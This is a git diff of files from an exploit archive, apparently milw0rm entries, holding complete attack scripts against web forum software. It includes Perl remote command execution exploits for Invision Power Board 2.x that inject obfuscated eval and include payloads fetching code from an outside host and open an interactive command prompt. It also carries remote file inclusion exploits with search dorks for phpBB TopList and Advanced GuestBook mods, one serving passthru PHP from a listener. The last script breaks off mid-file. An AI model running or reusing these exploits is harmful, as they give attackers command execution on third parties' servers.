-$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
-$created = 0;
-$text = 'r57ipbxplhohohoeval(include(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(114).chr(115).chr(116).chr(46).chr(118).chr(111).chr(105).chr(100).chr(46).chr(114).chr(117).chr(47).chr(114).chr(53)'. 
- '.chr(55).chr(105).chr(112).chr(98).chr(105).chr(110).chr(99).chr(46).chr(116).chr(120).chr(116))); //';
-$post = "st=0&act=Post&s=&f=${forum}&auth_key=${md5_check}&removeattachid=0&CODE=01&post_key=&TopicTitle=justxpl&TopicDesc=justxpl&poll_question=&ffont=0&fsize=0&Post=${text}&enableemo=yes&enablesig=yes&iconid=0";
-print $sock "POST ${dir}index.php HTTP/1.1\r\n";
-print $sock "Host: $host\r\n";
-print $sock "Cookie: session_id=$sid;\r\n";
-print $sock "Connection: close\r\n";
-print $sock "Content-Type: application/x-www-form-urlencoded\n";
-print $sock "Content-length: ".length($post)."\r\n\r\n";
-print $sock "$post";
-print $sock "\r\n\r\n";
-while (<$sock>)
- {
- if(/Location:/) { $created = 1; last; }
- }
-if($created) { print " [ DONE ]\r\n"; }
-else { print " [ FAILED ]\r\n"; exit(); }
-
-$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
-print "[~] Search message ...";
-$post = 'keywords=r57ipbxplhohohoeval&namesearch='.$login.'&forums%5B%5D=all&searchsubs=1&prune=0&prune_type=newer&sort_key=last_post&sort_order=desc&search_in=posts&result_type=posts';
-print $sock "POST ${dir}index.php?act=Search&CODE=01 HTTP/1.1\r\n";
-print $sock "Host: $host\r\n";
-print $sock "Cookie: session_id=$sid;\r\n";
-print $sock "Connection: close\r\n";
-print $sock "Content-Type: application/x-www-form-urlencoded\n";
-print $sock "Content-length: ".length($post)."\r\n\r\n";
-print $sock "$post";
-print $sock "\r\n\r\n";
-
-while (<$sock>)
- {
- if(/searchid=([a-f|0-9]{32})/) { $searchid = $1; last; }
- }
-
-if($searchid) { print " [ DONE ]\r\n"; }
-else { print "[ FAILED ]\r\n"; exit(); }
-print "[+] SEARCHID: $searchid\r\n";
-
-$get = 'index.php?act=Search&CODE=show&searchid='.$searchid.'&search_in=posts&result_type=posts&highlite=r57ipbxplhohohoeval&lastdate=z|eval.*?%20//)%23e%00';
-
-while ()
- {
- print "Command for execute or 'exit' for exit # ";
- while(<STDIN>)
- {
- $cmd=$_;
- chomp($cmd);
- 
exit() if ($cmd eq 'exit');
- last;
- }
- &run($cmd);
- }
-
-sub run()
- {
- $cmd =~ s/(.*);$/$1/eg;
- $cmd =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
- $cmd2 = '%65%63%68%6F%20%5F%53%54%41%52%54%5F%20%26%26%20';
- $cmd2 .= $cmd;
- $cmd2 .= '%20%26%26%20%65%63%68%6F%20%5F%45%4E%44%5F';
- $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
-
- print $sock "GET ${dir}${get}&eharniy_ekibastos=$cmd2 HTTP/1.1\r\n";
- print $sock "Host: $host\r\n";
- print $sock "Cookie: session_id=$sid;\r\n";
- print $sock "Connection: close\r\n\r\n";
-
- $on = 0;
- $runned = 0;
- while ($answer = <$sock>)
- {
- if ($answer =~ /^_END_/) { return 0; }
- if ($on == 1) { print " $answer"; }
- if ($answer =~ /^_START_/) { $on = 1; }
- }
- }
-
-sub header()
- {
- print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
- print " Invision Power Board 2.* commands execution exploit by RST/GHC\r\n";
- print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
- }
-
-sub usage()
- {
- print "r57ipbce.pl -h <host> -d <dir> -l <login> -p <password> -f <forum> -v <version>\r\n\r\n";
- print "<host> - host where IPB installed e.g www.ipb.com\r\n";
- print "<dir> - folder where IPB installed e.g. 
/forum/ , /ipb/ , etc...\r\n";
- print "<login> - login of any exist user\r\n";
- print "<password> - and password too )\r\n";
- print "<forum> - number of forum where user can create topic e.g 2,4, etc\r\n";
- print "<version> - forum version:\r\n";
- print " 0 - 2.0.*\r\n";
- print " 1 - 2.1.*\r\n";
- exit();
- }
-
-# milw0rm.com [2006-04-26]
+#!/usr/bin/perl
+
+## Invision Power Board 2.* commands execution exploit by RST/GHC
+## vulnerable versions <= 2.1.5
+## tested on 2.1.4, 2.0.2
+##
+## (c)oded by 1dt.w0lf
+## RST/GHC
+## http://rst.void.ru
+## http://ghc.ru
+
+
+use IO::Socket;
+use Getopt::Std;
+
+getopts("l:h:p:d:f:v:");
+
+$host = $opt_h;
+$dir = $opt_d;
+$login = $opt_l;
+$password = $opt_p;
+$forum = $opt_f;
+$version = $opt_v || 0;
+
+$|++;
+
+header();
+if(!$host||!$dir||!$login||!$password||!$forum) { usage(); }
+
+print "[~] SERVER : $host\r\n";
+print "[~] PATH : $dir\r\n";
+print "[~] LOGIN : $login\r\n";
+print "[~] PASSWORD : $password\r\n";
+print "[~] TARGET : $version";
+print (($version)?(' - IPB 2.1.*'):(' - IPB 2.0.*'));
+print "\r\n";
+
+print "[~] Login ... 
";
+
+$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
+$login =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
+$password =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
+$post = 'UserName='.$login.'&PassWord='.$password;
+$loggedin = 0;
+print $sock "POST ${dir}index.php?act=Login&CODE=01 HTTP/1.1\r\n";
+print $sock "Host: $host\r\n";
+print $sock "Connection: close\r\n";
+print $sock "Content-Type: application/x-www-form-urlencoded\n";
+print $sock "Content-length: ".length($post)."\r\n\r\n";
+print $sock "$post";
+print $sock "\r\n\r\n";
+while (<$sock>)
+{
+ if(/session_id=([a-f|0-9]{32})/) { $sid = $1; }
+}
+$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
+print $sock "GET ${dir}index.php HTTP/1.1\r\n";
+print $sock "Host: $host\r\n";
+print $sock "Cookie: session_id=$sid;\r\n";
+print $sock "Connection: close\r\n\r\n";
+while (<$sock>)
+{
+ if(/act=Login&CODE=03/) { $loggedin = 1; last; }
+}
+if($loggedin) { print " [ DONE ]\r\n"; }
+else { print " [ FAILED ]\r\n"; exit(); }
+
+print "[+] SID: $sid\r\n";
+
+print "[~] Try get md5_check ...";
+$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
+if($version==1)
+ {
+ print $sock "GET ${dir}index.php?act=post&do=new_post&f=${forum} HTTP/1.1\r\n";
+ }
+else
+ {
+ print $sock "GET ${dir}index.php?act=Post&CODE=00&f=${forum} HTTP/1.1\r\n";
+ }
+print $sock "Host: $host\r\n";
+print $sock "Cookie: session_id=$sid;\r\n";
+print $sock "Connection: close\r\n\r\n";
+while (<$sock>)
+ {
+ if($version == 1 && /ipb_md5_check\s*= \"([a-f|0-9]{32})\"/) { $md5_check = $1; last; }
+ if($version == 0 && /auth_key' value='([a-f|0-9]{32})/) { $md5_check = $1; last; }
+ }
+close($sock);
+if($md5_check) { print " [ DONE ]\r\n"; print "[+] MD5_CHECK : $md5_check\r\n"; }
+else { print " [ FAILED ]\r\n"; exit(); }
+
+print "[~] Create 
new message ...";
+$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
+$created = 0;
+$text = 'r57ipbxplhohohoeval(include(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(114).chr(115).chr(116).chr(46).chr(118).chr(111).chr(105).chr(100).chr(46).chr(114).chr(117).chr(47).chr(114).chr(53)'.
+ '.chr(55).chr(105).chr(112).chr(98).chr(105).chr(110).chr(99).chr(46).chr(116).chr(120).chr(116))); //';
+$post = "st=0&act=Post&s=&f=${forum}&auth_key=${md5_check}&removeattachid=0&CODE=01&post_key=&TopicTitle=justxpl&TopicDesc=justxpl&poll_question=&ffont=0&fsize=0&Post=${text}&enableemo=yes&enablesig=yes&iconid=0";
+print $sock "POST ${dir}index.php HTTP/1.1\r\n";
+print $sock "Host: $host\r\n";
+print $sock "Cookie: session_id=$sid;\r\n";
+print $sock "Connection: close\r\n";
+print $sock "Content-Type: application/x-www-form-urlencoded\n";
+print $sock "Content-length: ".length($post)."\r\n\r\n";
+print $sock "$post";
+print $sock "\r\n\r\n";
+while (<$sock>)
+ {
+ if(/Location:/) { $created = 1; last; }
+ }
+if($created) { print " [ DONE ]\r\n"; }
+else { print " [ FAILED ]\r\n"; exit(); }
+
+$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
+print "[~] Search message ...";
+$post = 'keywords=r57ipbxplhohohoeval&namesearch='.$login.'&forums%5B%5D=all&searchsubs=1&prune=0&prune_type=newer&sort_key=last_post&sort_order=desc&search_in=posts&result_type=posts';
+print $sock "POST ${dir}index.php?act=Search&CODE=01 HTTP/1.1\r\n";
+print $sock "Host: $host\r\n";
+print $sock "Cookie: session_id=$sid;\r\n";
+print $sock "Connection: close\r\n";
+print $sock "Content-Type: application/x-www-form-urlencoded\n";
+print $sock "Content-length: ".length($post)."\r\n\r\n";
+print $sock "$post";
+print $sock "\r\n\r\n";
+
+while (<$sock>)
+ {
+ if(/searchid=([a-f|0-9]{32})/) { $searchid = $1; last; }
+ }
+
+if($searchid) { print " [ DONE 
]\r\n"; }
+else { print "[ FAILED ]\r\n"; exit(); }
+print "[+] SEARCHID: $searchid\r\n";
+
+$get = 'index.php?act=Search&CODE=show&searchid='.$searchid.'&search_in=posts&result_type=posts&highlite=r57ipbxplhohohoeval&lastdate=z|eval.*?%20//)%23e%00';
+
+while ()
+ {
+ print "Command for execute or 'exit' for exit # ";
+ while(<STDIN>)
+ {
+ $cmd=$_;
+ chomp($cmd);
+ exit() if ($cmd eq 'exit');
+ last;
+ }
+ &run($cmd);
+ }
+
+sub run()
+ {
+ $cmd =~ s/(.*);$/$1/eg;
+ $cmd =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
+ $cmd2 = '%65%63%68%6F%20%5F%53%54%41%52%54%5F%20%26%26%20';
+ $cmd2 .= $cmd;
+ $cmd2 .= '%20%26%26%20%65%63%68%6F%20%5F%45%4E%44%5F';
+ $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
+
+ print $sock "GET ${dir}${get}&eharniy_ekibastos=$cmd2 HTTP/1.1\r\n";
+ print $sock "Host: $host\r\n";
+ print $sock "Cookie: session_id=$sid;\r\n";
+ print $sock "Connection: close\r\n\r\n";
+
+ $on = 0;
+ $runned = 0;
+ while ($answer = <$sock>)
+ {
+ if ($answer =~ /^_END_/) { return 0; }
+ if ($on == 1) { print " $answer"; }
+ if ($answer =~ /^_START_/) { $on = 1; }
+ }
+ }
+
+sub header()
+ {
+ print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
+ print " Invision Power Board 2.* commands execution exploit by RST/GHC\r\n";
+ print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
+ }
+
+sub usage()
+ {
+ print "r57ipbce.pl -h <host> -d <dir> -l <login> -p <password> -f <forum> -v <version>\r\n\r\n";
+ print "<host> - host where IPB installed e.g www.ipb.com\r\n";
+ print "<dir> - folder where IPB installed e.g. 
/forum/ , /ipb/ , etc...\r\n";
+ print "<login> - login of any exist user\r\n";
+ print "<password> - and password too )\r\n";
+ print "<forum> - number of forum where user can create topic e.g 2,4, etc\r\n";
+ print "<version> - forum version:\r\n";
+ print " 0 - 2.0.*\r\n";
+ print " 1 - 2.1.*\r\n";
+ exit();
+ }
+
+# milw0rm.com [2006-04-26]
diff --git a/platforms/php/webapps/1722.txt b/platforms/php/webapps/1722.txt
index cd8ab282c..ccf551b5f 100755
--- a/platforms/php/webapps/1722.txt
+++ b/platforms/php/webapps/1722.txt
@@ -1,8 +1,8 @@
-Title: TopList Hack for PHPBB <= 1.3.8 Remote File Inclusion
-URL: http://www.phpbb2hacks.de/toplist-df148.html
-Dork: inurl:"toplist.php" "powered by phpbb"
-Credits: [Oo]
-
-Exploit: /toplist.php?f=toplist_top10&phpbb_root_path=http://yourhost/cmd.gif?cmd=ls
-
-# milw0rm.com [2006-04-27]
+Title: TopList Hack for PHPBB <= 1.3.8 Remote File Inclusion
+URL: http://www.phpbb2hacks.de/toplist-df148.html
+Dork: inurl:"toplist.php" "powered by phpbb"
+Credits: [Oo]
+
+Exploit: /toplist.php?f=toplist_top10&phpbb_root_path=http://yourhost/cmd.gif?cmd=ls
+
+# milw0rm.com [2006-04-27]
diff --git a/platforms/php/webapps/1723.txt b/platforms/php/webapps/1723.txt
index b7ac87006..5eecfb117 100755
--- a/platforms/php/webapps/1723.txt
+++ b/platforms/php/webapps/1723.txt
@@ -1,7 +1,7 @@
-Title: Advanced GuestBook for phpBB <= 2.4.0 Remote File Inclusion
-Dork: inurl:guestbook.php "Advanced GuestBook" "powered by phpbb"
-Credits: [Oo]
-
-Exploit: http://[url]/[phpbb_path]/admin/addentry.php?phpbb_root_path=http://[badscript]?
-
-# milw0rm.com [2006-04-28]
+Title: Advanced GuestBook for phpBB <= 2.4.0 Remote File Inclusion
+Dork: inurl:guestbook.php "Advanced GuestBook" "powered by phpbb"
+Credits: [Oo]
+
+Exploit: http://[url]/[phpbb_path]/admin/addentry.php?phpbb_root_path=http://[badscript]?
+
+# milw0rm.com [2006-04-28]
diff --git a/platforms/php/webapps/1724.pl b/platforms/php/webapps/1724.pl
index 513f5fa30..b05798b6c 100755
--- a/platforms/php/webapps/1724.pl
+++ b/platforms/php/webapps/1724.pl
@@ -1,63 +1,63 @@
-# TopList Hack for PHPBB <= 1.3.8 Remote File Inclusion
-# Based on http://milw0rm.com/exploits/1722
-# Bug found by : [Oo]
-#
-# No more uploading php shells !!!
-# This is my way of php include exploitation !!!
-# Learn to play with sockets !!!
-# FOX_MULDER (fox_mulder@abv.bg)
-
-#!/usr/bin/perl
- use LWP 5.64;
- use IO::Socket;
- use LWP::Simple;
-
-(my $hostname, my $target, my $dir,my $command) = @ARGV;
-
-if(@ARGV < 4) {
-print "=======================================================================+\n";
-print "TopList REMOTE COMMAND EXECUTION EXPLOIT by fox_mulder\@abv.bg |\n";
-print "Usage: top.pl yourIP target /dir/ \"command\" |\n";
-print "Example: top.pl 10.20.30.40 www.microsoft.com /forum/ \"uname -a\" |\n";
-print "=======================================================================+\n";
-exit;
-}
-print "[+]Creating listening socket . . .\n";
-my $sock = new IO::Socket::INET (
- LocalHost => "$hostname",
- LocalPort => '9999',
- Proto => 'tcp',
- Listen => 1,
- Reuse => 1,
- );
- die "Could not create socket: $!\n" unless $sock;
-
- if (my $pid = fork){
- my $new_sock = $sock->accept();
- my $request = <$new_sock>;
- print $new_sock "HTTP/1.1 200 OK\n";
- print $new_sock "Content-Length: $content_length\n";
- print $new_sock "Content-Type: text/plain\n\n";
- print $new_sock "<? error_reporting(0);passthru(\"$command\"); ?>\n";
- close $new_sock;
- exit;
- }
-print "[+]Injecting command . . 
.\n";
-
-my $browser = LWP::UserAgent->new;
- $browser->agent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
-
- my $url = "http://$target/$dir/toplist.php";
- my $response = $browser->post( $url,
- [
- 'f' => "toplist_top10",
- 'phpbb_root_path' => "http://$hostname:9999/blah.php"
-]
- );
-
- die "Received invalid response type", $response->content_type
- unless $response->content_type eq 'text/html';
-
- print $response->content;
-
-# milw0rm.com [2006-04-28]
+# TopList Hack for PHPBB <= 1.3.8 Remote File Inclusion
+# Based on http://milw0rm.com/exploits/1722
+# Bug found by : [Oo]
+#
+# No more uploading php shells !!!
+# This is my way of php include exploitation !!!
+# Learn to play with sockets !!!
+# FOX_MULDER (fox_mulder@abv.bg)
+
+#!/usr/bin/perl
+ use LWP 5.64;
+ use IO::Socket;
+ use LWP::Simple;
+
+(my $hostname, my $target, my $dir,my $command) = @ARGV;
+
+if(@ARGV < 4) {
+print "=======================================================================+\n";
+print "TopList REMOTE COMMAND EXECUTION EXPLOIT by fox_mulder\@abv.bg |\n";
+print "Usage: top.pl yourIP target /dir/ \"command\" |\n";
+print "Example: top.pl 10.20.30.40 www.microsoft.com /forum/ \"uname -a\" |\n";
+print "=======================================================================+\n";
+exit;
+}
+print "[+]Creating listening socket . . .\n";
+my $sock = new IO::Socket::INET (
+ LocalHost => "$hostname",
+ LocalPort => '9999',
+ Proto => 'tcp',
+ Listen => 1,
+ Reuse => 1,
+ );
+ die "Could not create socket: $!\n" unless $sock;
+
+ if (my $pid = fork){
+ my $new_sock = $sock->accept();
+ my $request = <$new_sock>;
+ print $new_sock "HTTP/1.1 200 OK\n";
+ print $new_sock "Content-Length: $content_length\n";
+ print $new_sock "Content-Type: text/plain\n\n";
+ print $new_sock "<? error_reporting(0);passthru(\"$command\"); ?>\n";
+ close $new_sock;
+ exit;
+ }
+print "[+]Injecting command . . 
.\n";
+
+my $browser = LWP::UserAgent->new;
+ $browser->agent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
+
+ my $url = "http://$target/$dir/toplist.php";
+ my $response = $browser->post( $url,
+ [
+ 'f' => "toplist_top10",
+ 'phpbb_root_path' => "http://$hostname:9999/blah.php"
+]
+ );
+
+ die "Received invalid response type", $response->content_type
+ unless $response->content_type eq 'text/html';
+
+ print $response->content;
+
+# milw0rm.com [2006-04-28]
diff --git a/platforms/php/webapps/1725.pl b/platforms/php/webapps/1725.pl
index a7ae82e04..c70d4b4cd 100755
--- a/platforms/php/webapps/1725.pl
+++ b/platforms/php/webapps/1725.pl
@@ -1,58 +1,58 @@
-#!usr/bin/perl
-use LWP::UserAgent;
-# Bug Found by [Oo]
-# Exploit coded by n0m3rcy
-# Copyright (c) 2006 n0m3rcy@bsdmail.org
-# Gr33tz; nukedx , Devil-00 , str0ke , cijfer
-# Usage; n0ag.pl <target> <cmd shell location> <cmd shell variable>
-if (@ARGV ne 3) { &usage; }
-else { &exploit; }
-sub header() {
-print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n";
-print "+ Advanced GuestBook for phpBB <= 2.4.0 Remote File Inclusion Exploit +\r\n";
-print "+ Bug found by [Oo] +\r\n";
-print "+ Copyright (c) 2006 n0m3rcy@bsdmail.org +\r\n";
-print "+ Gr33tz: nukedx , cijfer , str0ke , Devil-00 +\r\n";
-print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n";
-}
-sub usage() {
- &header;
- print "- Usage: $0 <target> <cmd shell location> <cmd shell variable>\r\n";
- print "- <target> -> Victim's target ex: www.victim.com/path/\r\n";
- print "- <cmd shell location> -> www.milw0rm.com/shelltxt\r\n";
- print "- <cmd shell variable> -> cmd\r\n";
- exit();
-}
-sub exploit () {
-my $tar = $ARGV[0];
-my $cmdt = $ARGV[1];
-my $cmdv = $ARGV[2];
-while() {
-print "[CMD] \$";
-while(<STDIN>) {
-$cmd=$_;
-chomp($cmd);
-my $exp = LWP::UserAgent->new() or die;
-my $go = HTTP::Request->new(GET =>$tar.' 
admin/addentry.php?phpbb_root_path='.$cmdt.'?&'.$cmdv.'='.$cmd)or die "\r\n[-] Connected fail\n";
-my $rgo = $exp->request($go);
-my $return = $rgo->content;
-my $return =~ tr/[\n]/[ê]/;
-if (!$cmd) { print "\nPlease Enter a Command\n\n"; $return =""; }
-elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
- { print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit }
-elsif ($return =~/^<br.\/>.<b>Fatal.error/) { print "\nInvalid Command or No Return\n\n" }
-if ($return =~ /(.*)/) {
-my $finreturn = $1;
-my $finreturn=~ tr/[ê]/[\n]/;
-print "\r\n$finreturn\n\r";
-print "[+] Exploit successed\r\n";
-last;
-}
-else { print "[CMD] \$"; }
-last;
-}
-exit;
-}
-}
-
-# milw0rm.com [2006-04-28]
+#!usr/bin/perl
+use LWP::UserAgent;
+# Bug Found by [Oo]
+# Exploit coded by n0m3rcy
+# Copyright (c) 2006 n0m3rcy@bsdmail.org
+# Gr33tz; nukedx , Devil-00 , str0ke , cijfer
+# Usage; n0ag.pl <target> <cmd shell location> <cmd shell variable>
+if (@ARGV ne 3) { &usage; }
+else { &exploit; }
+sub header() {
+print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n";
+print "+ Advanced GuestBook for phpBB <= 2.4.0 Remote File Inclusion Exploit +\r\n";
+print "+ Bug found by [Oo] +\r\n";
+print "+ Copyright (c) 2006 n0m3rcy@bsdmail.org +\r\n";
+print "+ Gr33tz: nukedx , cijfer , str0ke , Devil-00 +\r\n";
+print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n";
+}
+sub usage() {
+ &header;
+ print "- Usage: $0 <target> <cmd shell location> <cmd shell variable>\r\n";
+ print "- <target> -> Victim's target ex: www.victim.com/path/\r\n";
+ print "- <cmd shell location> -> www.milw0rm.com/shelltxt\r\n";
+ print "- <cmd shell variable> -> cmd\r\n";
+ exit();
+}
+sub exploit () {
+my $tar = $ARGV[0];
+my $cmdt = $ARGV[1];
+my $cmdv = $ARGV[2];
+while() {
+print "[CMD] \$";
+while(<STDIN>) {
+$cmd=$_;
+chomp($cmd);
+my $exp = 
LWP::UserAgent->new() or die;
+my $go = HTTP::Request->new(GET =>$tar.' admin/addentry.php?phpbb_root_path='.$cmdt.'?&'.$cmdv.'='.$cmd)or die "\r\n[-] Connected fail\n";
+my $rgo = $exp->request($go);
+my $return = $rgo->content;
+my $return =~ tr/[\n]/[ê]/;
+if (!$cmd) { print "\nPlease Enter a Command\n\n"; $return =""; }
+elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
+ { print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit }
+elsif ($return =~/^<br.\/>.<b>Fatal.error/) { print "\nInvalid Command or No Return\n\n" }
+if ($return =~ /(.*)/) {
+my $finreturn = $1;
+my $finreturn=~ tr/[ê]/[\n]/;
+print "\r\n$finreturn\n\r";
+print "[+] Exploit successed\r\n";
+last;
+}
+else { print "[CMD] \$"; }
+last;
+}
+exit;
+}
+}
+
+# milw0rm.com [2006-04-28]
diff --git a/platforms/php/webapps/1726.pl b/platforms/php/webapps/1726.pl
index 698d05d88..c0cc6fcac 100755
--- a/platforms/php/webapps/1726.pl
+++ b/platforms/php/webapps/1726.pl
@@ -1,356 +1,356 @@ -#!/usr/bin/perl -# Wed Apr 26 16:44:15 CEST 2006 jolascoaga@514.es -# -# INVISION POWER BOARD 2.1.5 <www.invisionboard.com> pr00f 0f c0ncept -# -# remote command execution. vuln credits goes to IceShaman. -# -# works only if you have perms to post a comment. Exploit with replye is -# in my TODO... -# -# 514 still r0xing. -# !dSR the hardc0re hax0rs ;) -# There is no kwel comments in this release, wait for next upgrade -#######################################################################/ - -use LWP::UserAgent; -use HTTP::Cookies; -use LWP::Simple; -use HTTP::Request::Common "POST"; -use HTTP::Response; -use Getopt::Long; -use strict; - -$| = 1; # ;1 = |$ - -my ($proxy,$proxy_user,$proxy_pass,$lang); -my ($arg_host,$debug,$ipb_user,$ipb_pass, $lang, $errors, $topic_index, $tmp_var); -my ($md5_key, $post_key, $tmp_var); - -my %lang_es = ( - 'name' => 'Spanish Language', - 'login' => "Ahora estás identificado", - 'incorrect' => "Nombre de usuario o contraseña incorrectos", - 'deleted' => "Tema Eliminado" -); - -my %lang_en = ( - 'name' => 'English language', - 'login' => "You are now logged in", - 'incorrect' => "Sorry, we could not find a member using those log in details", - 'deleted' => 'Topic Deleted', -); -my %lang_strings = (); - -my $ua = new LWP::UserAgent( - cookie_jar=> { file => "$$.cookie" }); - -my $options = GetOptions ( - 'host=s' => \$arg_host, - 'proxy=s' => \$proxy, - 'proxy_user=s' => \$proxy_user, - 'proxy_pass=s' => \$proxy_pass, - 'ipb_user=s' => \$ipb_user, - 'ipb_pass=s' => \$ipb_pass, - 'lang=s' => \$lang, - 'errors' => \$errors, - 'debug' => \$debug); - -my ($host, $forum_index) = $arg_host =~ m/(http.*?)index.*?showforum=(.*)/; -print "Host: $host\nForum Index: $forum_index\n" if $debug; - -&help unless ($host); - -# w0w0w0w0w0 is smarter than some one i know :D -if (!$lang) { - lang_autodetect(); - print "Detected lang is: $lang_strings{'name'}\n" if $debug; -} - -while (1){ - print "invvy:\\> "; - my $cmd = <STDIN>; 
- &invvy($cmd); -} - -sub invvy { - chomp (my $cmd = shift); - LWP::Debug::level('+') if $debug; - - $ua->agent("Morzilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!"); - - $ua->proxy(['http'] => $proxy) if $proxy; - my $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; - - ipb_login (); # This works with redirects enabled/disabled - - - ipb_post(); # Post in a main forum. - - ipb_exec ($cmd); - - ipb_delete ($forum_index, $topic_index); -} -# guglucitos team presents: - -sub help { - print "Syntax: ./$0 <url> [options]\n"; - print "\t--ipb_user, --ipb_pass (needed if dont allow anonymous posts)\n"; - print "\t--proxy (http), --proxy_user, --proxy_pass\n"; - print "\t--lang=[es|en] (default: autodetect)\n"; - print "\t--debug\n"; - print "\nExample\n"; - print "bash# $0 --host=http://www.somehost.com/index.php?showforum=2\n"; - print "\n"; - exit(1); -} - -# sponsorized by coca-cola -sub lang_autodetect { - - my $req = HTTP::Request->new (GET => $host."/index.php"); - $ua->proxy(['http'] => $proxy) if $proxy; - $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; - - print $req->as_string() if $debug; - - my $res = $ua->request($req); - my $html = $res->content(); - - if (($html =~ /Bienvenido,/) or ($html =~ /Fecha y Hora actual/)) { - %lang_strings = %lang_es; - return; - } - if (($html =~ /Welcome,/) or ($html =~ /Time is now/)) { - %lang_strings = %lang_en; - return; - } - print "Unknown lang switching to default: 'english'\n"; - %lang_strings = %lang_en; -} - -# login function for 2.1.5 -sub ipb_login { - my $content; - my $h = $host."/index.php?act=Login&CODE=01"; - print $h . "\n" if $debug; - my $req = POST $h,[ - 'referer' => $host, - 'UserName' => $ipb_user, - 'PassWord' => $ipb_pass, - 'CookieDate' => 1 - ]; #grab these, and send to dsr! 
- print $req->as_string() if $debug; - my $res = $ua->request($req); - if ($errors) { - print "[+] Context: Login in\n"; - print "HTTP Error code: ".$res->code()."\n"; - print "HTTP Location: ".$res->header("Location")."\n"; - my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s; - print "- ERROR -\nFind string: ".$lang_strings{'login'}."\n$error\n- ERROR -\n"; - } - if ($res->code() eq 302) { - $content = redirect ($res->header("Location")); - - } else { - - $content = $res->content(); - } - - if ($content =~ /$lang_strings{'login'}/ or $content =~ /Logged in as/) { - print "Logged in\n" if $errors; - } else { - die "Can't log in\n"; - } - -} - -sub redirect { - my ($addr) = @_; - my $req = HTTP::Request->new (GET => $addr); - $ua->proxy(['http'] => $proxy) if $proxy; - $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; - - print $req->as_string() if $debug; # MKSINK is r0xer - - my $res = $ua->request($req); - my $html = $res->content(); - - return $html; -} - -sub ipb_post { - # This is for posting into a main index. 
- - my $h = $host."/index.php?act=post&do=new_post&f=".$forum_index; - - my $req = HTTP::Request->new (GET => $h); - $ua->proxy(['http'] => $proxy) if $proxy; - $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; - - print $req->as_string() if $debug; #dirty_epic r0x++ - - my $res = $ua->request($req); - my $html = $res->content(); - - ($md5_key) = $html =~ m/var ipb_md5_check\s+= \"(.*?)\"/; - ($post_key) = $html =~ m/post_key' value='(.*?)'/; - - print "AUTH check: $md5_key\n" if $debug; - print "POST key: $post_key\n" if $debug; - - $tmp_var = int(rand(31337)); - my $exploitme = 'eval(system(getenv(HTTP_'.$tmp_var.'))); //'; # seeeeeei la weeeeei - $h = $host."/index.php"; - - print $h."\n" if $debug; - - my $req = POST $h, [ - 'st' => 0, - 'act' => "Post", - 's' => '', - 'f' => $forum_index, - 'auth_key' => $md5_key, - 'removeattachid' => 0, - 'MAX_FILE_SIZE' => 51200000, - 'CODE' => '01', - 'post_key' => $post_key, - 'TopicTitle' => '514 pwned', - 'TopicDesc' => '', - 'poll_question' => '', - 'ffont' => 0, - 'fsize' => 0, - 'Post' => $exploitme, - 'post_htmlstatus' => 0, - 'enableemo' => 'yes', - 'enablesig' => 'yes', - 'mod_options' => 'nowt', - 'iconid' => 0, - 'dosubmit' => 'Post New Topic' - ]; - - $ua->proxy(['http'] => $proxy) if $proxy; - $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; - - print $req->as_string() if $debug; - my $res = $ua->request($req); - my $html = $res->content(); - - print "Location: ".$res->header("Location") if $debug; - ($topic_index) = $res->header("Location") =~ m/showtopic=(\d+)/; - if ($errors) { - print "[+] Context: Creating post\n"; - print "HTTP Error code: ".$res->code()."\n"; - print 